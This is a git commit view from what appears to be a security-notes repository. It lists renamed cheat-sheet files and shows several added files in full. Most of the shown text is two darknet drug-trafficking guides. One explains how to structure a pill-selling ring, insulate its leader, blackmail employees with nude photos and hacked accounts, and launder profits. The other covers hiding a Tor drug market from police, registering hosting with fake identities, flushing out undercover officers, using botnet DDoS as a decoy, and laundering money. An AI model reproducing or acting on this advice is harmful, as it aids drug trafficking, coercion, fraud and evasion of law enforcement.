Browse Source

Cleanup; More to do

root 5 years ago
130 changed files with 3027 additions and 986 deletions
  1. +12
  2. +0
  3. +62
      Draft/Alprakings Guide to
  4. +23
      Draft/Anonymity Opsec Privacy
  5. +5
  6. +0
      Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics тАУ Michael.txt
  7. +55
      Draft/Attacking Defending Android
  8. +4
      Draft/Attacking Defending iOS
  9. +84
      Draft/BIOS UEFI Attacks
  10. +0
      Draft/Basic Security
  11. +329
      Draft/Becoming a Darknet Drug Lord -
  12. +0
      Draft/Building A Pentest
  13. +0
      Draft/Building A Pentest Lab/Lab Buffer Overflows.txt
  14. +0
      Draft/CTFs & Wargames
  15. +22
  16. +2
      Draft/Cheat sheets reference pages Checklists
  17. +0
      Draft/Cheat sheets reference pages Checklists -/Androguard.txt
  18. +0
      Draft/Cheat sheets reference pages Checklists -/Curl.txt
  19. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf
  20. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/Post Exploitation on Linux.txt
  21. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/QuickRef-Enum.txt
  22. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt
  23. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/cheat sheet Basic Linux Privilege Escalation.txt
  24. +0
      Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
  25. +0
      Draft/Cheat sheets reference pages Checklists -/Ncat.txt
  26. +0
      Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
  27. +0
      Draft/Cheat sheets reference pages Checklists -/Nmap.txt
  28. +0
      Draft/Cheat sheets reference pages Checklists -/Radare2.txt
  29. +0
      Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
  30. +0
      Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
  31. +0
      Draft/Cheat sheets reference pages Checklists -/ToDO.txt
  32. +0
      Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
  33. +0
      Draft/Cheat sheets reference pages Checklists -/Windows/Post Exploitation on Windows.txt
  34. +0
      Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt
  35. +0
      Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf
  36. +0
      Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
  37. +0
      Draft/Conference Video Archives Stuff
  38. +0
  39. +0
      Draft/Courses & Training
  40. +0
  41. +8
      Draft/Cryptography &
  42. +0
      Draft/Cryptography & Encryption/Linux Systems.txt
  43. +0
      Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
  44. +0
      Draft/Cryptography & Encryption/cull.txt
  45. +0
  46. +0
  47. +0
  48. +0
  49. +31
      Draft/Documentation & Reports
  50. +0
  51. BIN
      Draft/Draft/DRAFT Cyber Security Task Force Insurance Data Security Model Law.pdf
  52. +0
  53. BIN
      Draft/Draft/NIST Cyber Security Framework for Improving Critical Infrastructure 02122014.pdf
  54. BIN
  55. +0
      Draft/Draft/Securing Hardening_1/Securing Linux/Securing Linux.rtf
  56. +0
      Draft/Draft/Securing Hardening_1/Securing OS X/Securing OS X.rtf
  57. +0
      Draft/Draft/Securing Hardening_1/Securing Windows/Cull.txt
  58. +0
      Draft/Draft/Securing Hardening_1/Securing Windows/Securing Windows.rtf
  59. +0
      Draft/Draft/To Do/To Do.rtf
  60. +0
      Draft/Draft/To Do/add cull -3.txt
  61. +19
      Draft/Embedded Device & Hardware Hacking
  62. +0
  63. +308
  64. +0
      Draft/Exploit Development/Lab for Practicing Exploit Writing.txt
  65. +13
      Draft/Forensics Incident
  66. +0
  67. +0
      Draft/Frameworks Methodologies/Metasploit Reference.txt
  68. +0
      Draft/Frameworks Methodologies/Meterpreter Scripts and Description.txt
  69. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
  70. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt
  71. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
  72. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf
  73. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt
  74. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt
  75. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt
  76. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt
  77. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt
  78. +0
      Draft/Frameworks Methodologies/Post Exploitation with Metasploit.txt
  79. +66
      Draft/Fuzzing Bug
  80. +14
  81. +0
  82. +926
      Draft/Hacking Team
  83. +0
  84. +0
  85. +73
      Draft/Interesting Things Useful
  86. +0
      Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt
  87. +7
      Draft/Internet of
  88. +0
  89. +0
  90. +260
  91. +0
      Draft/Malware/Detect Virtualbox C prog.txt
  92. +141
      Draft/Network Attacks &
  93. +0
      Draft/Network Attacks & Defenses/Getting Busy at the Command Line.txt
  94. +4
      Draft/Network Security Monitoring &
  95. +31
      Draft/Open Source
  96. +0
      Draft/Open Source Intelligence/Active cull.txt
  97. +0
      Draft/Password Bruting and
  98. +0
  99. +1
  100. +59
      Draft/Privilege Escalation &

+ 12
- 0
Draft/1aCompleted_List View File

@ -0,0 +1,12 @@
Completed Sections(Have gone through once, cleared most of cull)
Sys internals

Draft/Draft/ → Draft/ View File

+ 62
- 0
Draft/Alprakings Guide to View File

@ -0,0 +1,62 @@
Alpraking's OPSEC guide to being a successful kingpin.
submitted 5 hours ago * by AlpraKing
For sale only $1999.97 unti.....
pls UPVOTE cuz FREE.
So you want to ship hundred of thousand of pills a week for years and stay safe?
Here's a couple of tips to keep you safe. I've been here since SR 1.0 under various aliases and have, over the course of my-3 years online career , shipped over 10 million pills. I used to press pills myself. Now last time i've seen a press was a year ago. I'm basically just smoking bowls and trolling on reddit now.
1. Outsource
Outsourcing simply refers to the noble art of hiring other people, "pawns of the checker", to do the dirty work. You want to hire clean people that dont arise suspicions. They will be doing the dirty work so you want to hire someone who isn't already involved in drug trade or has priors. Don't get me wrong, you'll do everything in your power to protect them. Remember, if your guys catch heat, it can propagate to deeper layers fairly quickly and ultimately, to you.
2. Separate Administration & Execution
Have a layer of people who are doing the "boss" work and another one who is doing the "executive" work. Boss work is mainly paperwork and verifications to ensure everyone is doing his job properly and numbers balance and quality control is in check. Administrators dont get their hand dirty as that they will not handle the drugs themselves, but they will make sure packs are being shipped, tracking codes are being handled, productions are being made correctly and such. Administration is a promotion for executives who have shown a great degree of skill and loyalty. You can't put just anyone to overlook someone else's work. You have to get someone who has done it before and will be able to train new personnel or solve irregular issues. I normally promote my executors to administrators once they have shown that they can handle any issue from their business. I have them hire one of their friend and pay both from my own pocket. Employees kind of like hearing "hey, how about you keep your salary, train your friend to do your job, and you both will earn the same thing, paid from the big boss' pocket." More than money, people want power. Give power to people who want power and keep the money for yourself.
3. Treat your employees well but do NOT overpay them.
Treat your employees well by giving them insurances, paid vacations & trips, surprises bonuses, gifts and such. Do NOT give them a large payout even if they're pressing or shipping hundreds of thousands of pills. If someone becomes too comfortable with his pay, his quality of work will lower. you have to keep your employees dependant on you. Overpaying employees = Bad work. Double loss. For example in my own company all employees have a health insurance. they are allowed up to 1500/month in private medical, psychological bills paid by my expense) If not used, it will be given as a bonus vacation trip every couple months. Any lawyer time they might need for questions is also paid by the company.
4. Don't hire people under 30 years old
Both in the administrative and executive field. People under 30 years old are reckless, like to hang out in bars and brag to friends. People over 30 years old (get 40,50+ if you can) tend to be more straight with their shit. Much less likely to steal or botch the work and normally know the value of money. If you can get someone 40 yo+ that doesn't have a record, its most likely someone who already had a full-time job and knows how to work decently and not do dirty shit. Im 20 btw.
5. Inform your people
Tell them the truth. what they're risking, what to expect, have them meet your own loyal people who already been arrested for you and have them testify about the backup they had for not snitching. People will be much less likely to switch on you if you've told them exactly the truth. Don't go around with "There's no risk!" bullshit. Not only will your guys not believe you but they'll totally go nuts when they get arrested if you do.
6. Back your own people
Make sure all of your people are properly lawyered up. have them know by heart the name and phone number of their designated lawyer (under your control) and have them meet regularly, all expenses paid by you, in order to strengthen this trust between the lawyer and the employee.
7. Don't hire people yourself
People close to you, that you love and value, should not be getting their hands dirty on the long run. have them quit, or promote them quickly, if you have them on the field. As soon as they've mastered their work, have them hire their own friend to do your work, and pay both.
8. Rotate your employees between jobs
By rotating your employees between various work in your company you not only prevent heat from accumulating on one particular place or person, confusing investigations, but you're also contributing to their general training. this has various positive consequences; You are able to better target the quality and flaws of your various employees by having them try numerous different things. Also, if a branch of the operation is arrested, you can quickly reach out to your other personnel who has done similar work in the past to fill the voids.
9. Have separate different secret workspots, and different labs.
In order to confuse investigations, its mandatory to have different personnel, workspots, and labs. If i feel that heat is growing on one lab, I can quickly clean it up, have the worker stop and lay low for a while, and i simply transfer the workload over another less-heated up lab and production-guy. Its very difficult to see all the connections amongst various people especially when dealing with over 30 employees, but its needed. These connections are what will carry heat. I tend to think of it a bit like a computer would:
10. Get it down to numbers. (TLDRs; skip this part)
its hard to explain this part with words so I'll give an example with numbers.
You suspect your packs are being profiled. If there is profiling going on, your courier is going to be considered the starting point of the heat. We will give it a 80% heat rating for this very event. Considering the courier access 3 times a week a stash, you will give the stash a 50% heat rating, just from this very link. the stash himself is linked to the lab, but only access it onces every 2 weeks. you will give your lab a 15% heat rating from this very event. Your treshold of risk is 70% (meaning you will shut down someone/somewhere that has over 70% heat rating), at this point you will shut down the courier and have him lay low, but the heat is not yet sufficient to close the stash and the lab, at 50% and 15% respectively
Now a few days later you see a cop car parked on the street of your lab. This very event is worth 50% heat on your lab, and will also drip a 20% heat on your stash and 5% on your courier due to the links.
Now shit got hot. Everything is above 70%. closing the entire branch.
You'll admit it doesn't take math to notice that if your packs are being profiled AND a cop car is seen near your lab, you must be pretty hot as a whole and you SHOULD shut down. All I did was add numbers to follow the flow of heat and decide wisely what is hot and what is not. My objective is to keep all places around 30-40% heat which i consider a stable zone. If 60-70% is reached im going to start investigating very closely, but I will not close it down. If it busts 80% then its being closed down and laid low for a few weeks. Its not accurate because you have to estimate everything with little to no information, but it definitely helps seeing things and calculate your moves. If an event bust 150%, i will completely dismantle the place and move it to another spot.
11. Trust buffers.
Always have a layer of administration between you and your executives. You don't hire any executives, have your administrators do it. By doing so, NO ONE at risk of being busted knows who you are, let alone that you exist. If employees get caught and want to snitch, all they'll snitch is your administrator, who you should have sufficient trust in to believe he wont snitch you also.
12. Family links between employees are powerful.
If you testify in court, you don't get to choose who you snitch and who you don't (In Canada at least). You snitch everything or nothing. So it helps if employees get caught with members of their families, because they are much less likely to snitch as it would involve having them snitch on their own family. You can also use the trust between members of a single family to your advantage. You can normally trust your employee's brother or sister pretty much the same as you can trust your employee. assuming both work for you.
13. Control the money
Do not reveal how much you're making or how much people are making relative to one another. Its none of their business. I normally fund in cash one of my administrators with a lot of cash and he pays everyone by sending them cash in the mail, or bitcoins. He makes comptability records and bring them to me so i can see where the money went, before I handle more cash/btc to him.
14. Encrypt everything
Have your employees familiar with tails & tor+pgp communications. Anyone minially professional will take some notes. Make sure all your employees from the top to the bottom is familiar with TAILS and has a secure passphrase. Have them place all their documentation and notes there. Any paper hanging around must be burned.
15. Avoid keeping illegal shit around the "dangerous hours".
I refer to "Dangerous hours" as week-days 5AM to 8AM. My experience has shown me 90% of large drug raids occur during this time period.
16. Not everyone has to know everyone.
Its everyone's dream to think its like the movies where we gangsta organise "cartel parties" where everyone is invited. It doesn't work that way. If someone doesn't have to meet someone, don't make them meet. Don't take the risk of adding up more "heat rating" by creating un-necessary links between individuals who are not directly connected.
17. Keep "jokers"
Jokers are last-resort cards that allow you to solve dangerous issues or take-over control of your business in the event of catastrophic problems. Pictures of your employees naked, hacked passwords to their facebooks, knowing their addresses, etc. Anything you can use against them if shit goes wrong helps.
18. Be diplomat when kicking people out
Always be very diplomat when kicking people out. Give them a nice fat good-bye paycheck and specify you're giving them this paycheck to "forget everything". Keep good terms and explain your decisions with opsec and that you're doing this for their own protection.
19. If your company screw up, pickup the pieces, dont flee.
Believe me, its worth more in the long run if you admit to being busted/admit to problems, refund everyone, close shop for a few months, and come back, than it is to exit scam and start under a new name. It builds confidence in the long run. Its easy to be honest when your business goes well. But its in the bad moments that you show your true face. If you've been fucked in the past, been honest with everyone then came back, it gives an assurance that the same will happen if there's a fuckup in the future. How many vendors look so perfect until they start having issues? and when they do, most will run with customers money. If you are honest with customers despite problems, it will reward you later. It also helps looking at yourself in the mirror in the morning knowing you haven't fucked over a ton of people with less wealth than you.
20. Always change
Always change lab locations, stealth, rotate employees, open and closes front or laundering shops. Have several at the same time so you can switch work between places. Its like playing whack a mole with LE. If you stay too long in one single place, you'll get caught. I do not believe in "megalabs" with super OPSEC that are stable for years. A decentralised network of several small labs & dispatch places, constantly changing places, is the best. Its even better when you can afford to change places AND employee at the same time. Literally drops heat rating to 0%
21. Make sure your team's opsec is always on point.
Meet regularly with your administrators and have them tell you all the problems. Never get angry and don't judge them. They'll be much more open if they do not fear your reaction. Everyone can make mistakes. Your administrators should have the same attitude toward their employees. A transparent company allows you to see more problems and react accordingly.
22. Don't flash
Don't. Just don't. Fuck nice cars & nice houses as long as you are on the field or know directly people who work on the field. That will get you heated up more than anything else. Pile your money, hide it and work on laundering it with as much care and opsec as you do with your drugs. Fuel it in a legitimate business, with customers, then start laundering it slowly. Remember, as long as your money isn't properly laundered, its virtual. Anything you buy with it is a cursed gift that will increase your own heat and can also potentially be seized by LE. You can start flashing when all your work has been securely outsourced or when you retire.
23. Dont get high on your own supply
You should actually never even have your own supply in your house or somewhere that could be linked to you. It also impairs your judgement and can worsen paranoia, narcissism and other personality problems you tend to develop being in the drug business. Especially Xanax. Dont take Xanax and take important decisions; you will regret it.
24. Prepare for an arrest
Prepare yourself, psychologically and with your lawyer, your family, your administrators, in the event of a bust. Make sure you have cash readily accessible by your trusted people and have a plan. You won't be able to interact much with the outside world starting the very moment your door is rammed. And you won't be told when it would happen. Run "simulations" of a scenario where you and several of your administrators are arrested. Make sure someone can take your place or at least handle your personnal stuff, and get yourself a lawyer early on the payroll. Everytime you go to sleep in your bed, it might be the last night you get to pass there for a couple years. And everytime you peacefully wake up in the morning, congrats yourself that you have survived yet another day.
The end
Well not really, I wrote that nonstop just spewing out ideas. I think I could continue until 100. but my coke binge is over and i'm growing tired of writing. Good luck with your high-volume ambition, plebs. >:)
P.S. Whoever is pressing fentanyl in xanax bars; Stop. Please. You're attracting LE attention on my game and making me lose sales due to everyone freaking the fuck out in the streets. And you're killing people. It's wrong.

Draft/Draft/Anonymity Opsec Privacy → Draft/Anonymity Opsec Privacy View File

Draft/Draft/ → Draft/ View File

Draft/Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics – → Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics тАУ Michael.txt View File

Draft/Draft/Attacking Defending Android → Draft/Attacking Defending Android View File

Draft/Draft/Attacking Defending iOS → Draft/Attacking Defending iOS View File

Draft/Draft/BIOS UEFI Attacks → Draft/BIOS UEFI Attacks View File

Draft/Draft/Basic Security → Draft/Basic Security View File

+ 329
- 0
Draft/Becoming a Darknet Drug Lord - View File

@ -0,0 +1,329 @@
So, you want to be a darknet drug lord...
by nachash
[The advice in this article can be adapted to suit the needs of other
hidden services, including ones which are legal in your jurisdiction.
The threat model in mind is that of a drug market. The tone is that of a
grandfather who is always annoyingly right, who can't help but give a
stream-of-consciousness schooling to some whippersnapper about the way
the world works. If this article inspires you to go on a crime spree and
you get caught, don't come crying to me about it.]
You've decided that you're bored with your cookie-cutter life of working
at a no-name startup, getting paid in stock options and empty promises.
You want a taste of the good life. Good for you, kid. I used to run a
fairly popular hidden service (DOXBIN) that was seized by the FBI after
3 1/2 years of spreading continuous butthurt, then subsequently
repossessed from the feds. Because I managed to not get raided, I'm one
of the few qualified to instruct others on hidden services and security,
simply because I have more real-world experience operating hidden
services than the average tor user. In other words, very little of this
advice is of the armchair variety, as you'll often find in abundance the
Internet. But enough about me. Let's talk about your future as an
internet drug lord.
1. Legal/Political
First things first, you need to cover the legal, historical and
political angles. Read up on various drug kingpins and cartels from the
20th century. Learn everything you can about how they rose and fell (
you can safety ignore all the parts about intelligence agencies backing
one drug cartel over another, because that's not going to happen to
you). Once you've got a good command of that, read everything you can
about busted drug market operators and branch out into cybercrime
investigations as well. It wouldn't hurt to make yourself familiar with
law enforcement and intelligence agency tactics either. You'll find that
virtually all drug kingpins either get murdered or go to prison. Let
those lessons sink in, then find a good drug lawyer and make plans for
being able to pay them when The Man seizes everything you own. While
you're dreaming big about making fat stacks of fake internet money, do
some research on Mutual Legal Assistance Treaties and extradition treaties.
Mutual Legal Assistance Treaties (MLATs) are self-explanatory. Country A
will help Country B do whatever it takes to aid a cybercrime
investigation should some aspect of the crime bleed over into Country A.
Figure out which countries don't provide legal assistance to your
country in these cases, then find hosting services that are based there.
You'll shorten this list by determining which hosts allow tor, or at
least don't explicitly forbid it in their Terms of Service (you don't
care about exit bandwidth. You just want relays. Remember this for later
in the article). Last but not least, sort out which hosts accept payment
options that don't make you sweat bullets over the fact that the NSA has
been monitoring global financial transactions since at least the 1970s.
You will want to avoid any host that advertises itself as bulletproof --
they'll probably kit your box and siphon everything of value, in
addition to overcharging you for the privilege of running on older
hardware -- and any host which sells a cheap VPS and promises to
guarantee your privacy.
Extradition treaties mean that if you're in Country A and do something
that makes Country B want to prosecute you, Country A is most likely
going to give you a one way ticket to Country B. If or when your box
gets seized and you know the heat is on, you're going to want to beat it
to a place that won't send you back, where you will presumably live out
the rest of your days. Just make sure you've made enough money to grease
all the right palms in your new life, or the road ahead may be extremely
bumpy. If you're smart, you'll permanently move to this country well
before you have any trouble with law enforcement.
One last thing before moving on: Don't be so stupid as to attempt to
hire a hitman to kill anyone. Murder-related charges have no statute of
limitations, which means you won't get to write a tell-all book about
what a sly bastard you are when this wild ride is a distant memory. If
you've reached a point in your new career where murdering people makes
sense, it's time to walk away. Don't get corrupted like Dread Pirate
2. Technical
This section tries to be as operating system independent as possible.
You'll want to consult the documentation of your OS for specifics. The
technical side of running a hidden service and not getting owned by cops
is a lot harder than just installing stuff and crossing your fingers.
The recommendations in this section WILL NOT protect you from 0days in
the wild, but should help somewhat with damage control. Remember, if
they want to own your hidden service, it will probably happen eventually.
Before you even think about installing bitwasp and tor, you need to
really understand how tor works. Go to and read the white
papers until your eyes glaze over, then continue reading until you're
out of papers to read. Pay particular attention to the hidden service
papers. If you feel like you didn't understand something, come back to
that paper again when you have more knowledge. A lot of the papers
explain some of the same concepts with slight differences in the intros.
Don't skim over them, because you might read someone's rewording that
will clarify an idea for you. Check back with freehaven regularly. Once
you're up to speed, a good next step is to keep up with the tor
project's mailing lists. [1]
While you're doing all of this reading, it's (mostly) safe to go ahead
and install tor on a box on your local network, purely for
experimentation. Keep in mind that the NSA will start scooping up all of
your packets simply because you visited That means don't
post code questions related your drug market on Stack Exchange, if you
want to avoid giving The Man morsels he can use for parallel
construction. Once you've gotten hidden services working for http and
ssh, you're going to take the first baby step towards evading casual
discovery: Bind your hidden services to localhost and restart them.
The next step in your journey towards changing the drug business forever
is to grab the transparent proxying firewall rules for your operating
system to make sure they work. [2] They will guard against attacks that
cause your box to send packets to a box the attacker controls, which is
useful in thwarting attempts to get the box IP. You may wish to have a
setup similar to an anonymous middle box, preferably without public IPs
where possible, so if your application gets rooted tor isn't affected.
Speaking of applications, do everything you can to ensure that the
application code you use to power your hidden service isn't made of
Swiss cheese and used bandaids. To protect against other types of
attacks, you will want to identify any pre-compiled software that your
users will touch and compile it yourself with hardening-wrapper or it's
equivalent, plus any custom flags you want to use. If you keep
vulnerabilities from the application and server to a minimum, your
biggest worries will be tor-related.
You will only connect to your production box via a hidden service. It's
a good idea to get into that habit early. The only time deviating from
this pattern is acceptable is when you have to upgrade tor, at which
time you'll want to have a script ready that drops your firewall rules
and unbinds ssh from localhost just long enough for you to login, do the
upgrade, re-apply the firewall rules and bind ssh to localhost again. If
you're not ready to deal with the latency, you're not ready to do any of
this. Don't forget to transparently proxy the machine you use too, so
you don't slip up by mistake.
On the subject of the machine, you need to automate the process of both
setting up your hidden service and of destroying it. Proactively change
servers every few months, in order to frustrate law enforcement attempts
to locate and seize your site. Your creation script should install
everything your site needs as well as all configuration files. Your
clean-up script needs to destroy all evidence, preferably with a tool
like srm.
Regarding time-related issues: Always select either UTC or a time zone
that doesn't match the box's location. You will also do this to the box
you use to interact with your hidden service every day. If you read the
whitepapers, you will probably note a recurring theme of clock
skew-related attacks, mostly directed at clients, in some of the older
papers. Tor won't even start if the clock skew is off by too much.
If you want to have some fun at the expense of business in the short
term, intentionally take your service offline periodically in order to
mess up attempts to match your downtime with public information. If
you're the kind of person with access to botnets, you could DDoS
(Distributed Denial of Service) some provider at the same time on the
off chance that someone might connect the dots. This counter-measure
will only work on researchers looking at public info, not nation state
actors with an ax to grind.
I've saved some of the hardest stuff for the last part of this section.
It's hard because you have to make choices and it's unclear which of
those choices are the best. It's a bit like a Choose Your Own Adventure
book. In that spirit, all I can do is lay out the possibilities in as
much of a Herodotus-like way as possible.
One thing you have to consider is whether you want to run your hidden
service as a relay or not. If it's a relay, you'll have extra cover
traffic from other innocent tor users. But if your relay goes down at
the same time as your hidden service, it will be far more likely to be
noticed. Federal criminal complaints make a big deal of seized hidden
services not being relays, but three relays were taken down at around
the same time as Operation Onymous, so that's not a guaranteed defense.
The choice is yours.
Remember when I said to take note of hosts that don't ban tor outright?
This is the part where you give back to the community in the form of tor
relays or bridges. [3] The feel-good aspects of this move are along the
same lines as drug barons who build schools and hospitals, but this is
more immediately self-serving. You're going buy several servers to set
up strictly as relays or bridges, then configure your hidden service box
to use only those relays or bridges to enter the tor network. Here's
where things start to get theoretical.
If an adversary is running a guard node discovery attack -- in which an
attacker is able to determine the node you're using to enter the tor
network -- against your service and you're using your own relays as
entry nodes, the damage they can do will be limited to DoS (Denial of
Service) if your relays are not linkable to your identity. However, if
you're entering the tor network with bridge nodes, an attacker will
probably say "WTF?" at first unless they determine they've found a
bridge node. Bridge nodes don't use nearly as much bandwidth as relays
because there is not a public list of them, so an intelligence agency
would have less traffic to sift through, which makes correlation easier.
On the other hand, using bridge nodes also allows you to run obfsproxy
[4] on both the bridges and your hidden service. obfsproxy allows you to
make tor traffic appear to be another type of traffic, which is a good
defense against non-Five Eyes entities. For example, your hosting
provider may decide to monitor for tor traffic for their own reasons.
Just make sure your relays/bridges aren't linkable to you or to each other.
One last thing about guard node discovery attacks: The Naval Research
Lab published a paper in July 2014 about the "Sniper Attack," [5] which
in short works like this: The attacker discovers your guard nodes, then
uses an amplified DoS trick to exhaust the memory on all of your nodes.
The attacker keeps doing this until your hidden service uses guard nodes
that they control. Then it's game over. If your hidden service's entry
nodes are all specified in your torrc file and they get DoSed, your
service will go offline. In this situation, if all of your relays are
down, you essentially have an early warning canary that you're being
targeted. In other words: This is the best possible time to book your
one-way ticket to your chosen non-extradition country. For those of you
with a background in writing exploits, this is similar in principle to
how stack smashing protection will render some exploits either unable to
function or will turn them into a DoS. Personally, I recommend an
ever-changing list of relays or bridges. Add a few new ones at a
pre-determined interval, and gradually let old ones go unpaid.
3. Operational Security
This section is critical, especially when things start to break down. If
everything else goes bad, following this section closely or not could be
the difference between freedom and imprisonment.
This is important enough to re-state: Transparently proxy your tor
computer. This is a good first line of defense, but it is far from the
only way to protect yourself.
Do not contaminate your regular identity with your Onion Land identity.
You're an aspiring drug kingpin. Go out and pay cash for another
computer. It doesn't have to be the best or most expensive, but it needs
to be able to run Linux. For additional safety, don't lord over your new
onion empire from your mother's basement, or any location normally
associated with you. Leave your phone behind when you head out to manage
your enterprise so you aren't tracked by cell towers. Last but not least
for this paragraph, don't talk about the same subjects across identities
and take counter-measures to alter your writing style.
Don't log any communications, ever. If you get busted and have logs of
conversations, the feds will use them to bust other people. Logs are for
undercover cops and informants, and have no legitimate use for someone
in your position. Keep it in your head or don't keep it at all.
At some point, your enterprise is going to have to take on employees.
Pulling a DPR move and demanding to see ID from high-volume sellers and
employees will just make most people think you're a fed, which will
leave your potential hiring pool full of dumbasses who haven't even
tried to think any of this out. It will also make it easier for the feds
to arrest your employees after they get done arresting you. If your
enterprise is criminal in nature -- whether you're selling illegal goods
and services or you're in a repressive country that likes to re-educate
and/or kill dissidents -- an excellent way of flushing out cops is to
force them to get their hands not just dirty, but filthy, as quickly as
possible. Don't give them time to get authorization to commit a crime
spree. If there's a significant amount of time between when they're
given crimes to commit and the commission of those crimes, you need to
assume you've got an undercover cop on your hands and disengage. If they
commit the crime(s) more or less instantly, you should be fine unless
you've got the next Master Splynter on your trail. [6]
Disinformation is critical to your continued freedom. Give barium meat
tests to your contacts liberally. [7] It doesn't matter if they realize
they're being tested. Make sure that if you're caught making small talk,
you inject false details about yourself and your life. You don't want to
be like Ernest Lehmitz, a German spy during World War II who sent
otherwise boring letters about himself containing hidden writing about
ship movements. He got caught because the non-secret portion of his
letters gave up various minor personal details the FBI correlated and
used to find him after intercepting just 12 letters. Spreading
disinformation about yourself takes time, but after a while the tapestry
of deceptions will practically weave itself.
Ensure that your communications and data are encrypted in transit and at
rest whenever applicable. This means PGP for e-mail and OTR for instant
messaging conversations. If you have to give data to someone, encrypt it
first. For the tor-only box you use for interacting with your hidden
service, full disk encryption is required. Make a password that's as
long and complex as you can remember ("chippy1337" is not an example of
a good password). Last but not least, when you're done using your
dedicated tor computer, boot into memtest86+. Memtest86+ is a tool for
checking RAM for errors, but in order to do that it has to write into
each address. Doing so essentially erases the contents of the RAM.
Turning your computer off isn't good enough. [8] If you're planning to
use TAILS, it will scrub the RAM for you automatically when you shut
down. Once your RAM is clean, remove the power cord and any batteries if
you're feeling extra paranoid. The chips will eventually lose any
information that is still stored in them, which includes your key. The
feds can do a pre-dawn raid if they want, but if you follow this step
and refuse to disclose your password, you'll make James Comey cry like a
small child.
Use fake info when signing up for hosting services. Obfuscate the money
trail as much as possible and supply fake billing info. I prefer
registering as criminals who are on the run, high government officials,
or people I dislike. If your box gets seized and your hosting company
coughs up the info, or if a hacking group steals your provider's
customer database (It happens more often than you'd think), your hosting
information needs to lead to a dead end. All signs in Operation Onymous
point to operators being IDed because they used real info to register
for hosting service and then their box got decloaked.
Speaking of money, you're going to have to figure out how to launder
your newfound assets, and we're not talking about using a couple bitcoin
laundering services and calling it a day. You also shouldn't go out and
buy a Tesla. Living beyond your means is a key red flag that triggers
financial and fraud investigations. Remember, money is just another
attack vector. Washing ill-gotten gains is a time-honored drug business
tradition and one that you would be a fool not to engage in. You can
only use your hard-won profits to send packages to
people you don't like so many times.
Take-away: If you rely only on tor to protect yourself, you're going to
get owned and people like me are going to laugh at you. Remember that
someone out there is always watching, and know when to walk away. Do try
to stay safe while breaking the law. In the words of Sam Spade, "Success
to crime!"

Draft/Draft/Building A Pentest → Draft/Building A Pentest View File

Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt → Draft/Building A Pentest Lab/Lab Buffer Overflows.txt View File

Draft/Draft/CTFs & Wargames → Draft/CTFs & Wargames View File

+ 22
- 0
Draft/Car View File

@ -0,0 +1,22 @@
#Car Hacking
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](
Yet Another Car Hacking Tool](
* CANToolz is a framework for analysing CAN networks and devices. This tool based on different modules which can be assembled in pipe together and can be used by security researchers and automotive/OEM security testers for black-box analysis and etc. You can use this software for ECU discovery, MITM testing, fuzzing, bruteforcing, scanning or R&D testing and validation

Draft/Draft/Cheat sheets reference pages Checklists → Draft/Cheat sheets reference pages Checklists View File

Draft/Draft/Cheat sheets reference pages Checklists -/Androguard.txt → Draft/Cheat sheets reference pages Checklists -/Androguard.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt → Draft/Cheat sheets reference pages Checklists -/Curl.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf → Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/Post Exploitation on Linux.txt → Draft/Cheat sheets reference pages Checklists -/Linux/Post Exploitation on Linux.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/QuickRef-Enum.txt → Draft/Cheat sheets reference pages Checklists -/Linux/QuickRef-Enum.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt → Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/cheat sheet Basic Linux Privilege Escalation.txt → Draft/Cheat sheets reference pages Checklists -/Linux/cheat sheet Basic Linux Privilege Escalation.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt → Draft/Cheat sheets reference pages Checklists -/Metasploit.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt → Draft/Cheat sheets reference pages Checklists -/Ncat.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt → Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt → Draft/Cheat sheets reference pages Checklists -/Nmap.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Radare2.txt → Draft/Cheat sheets reference pages Checklists -/Radare2.txt View File

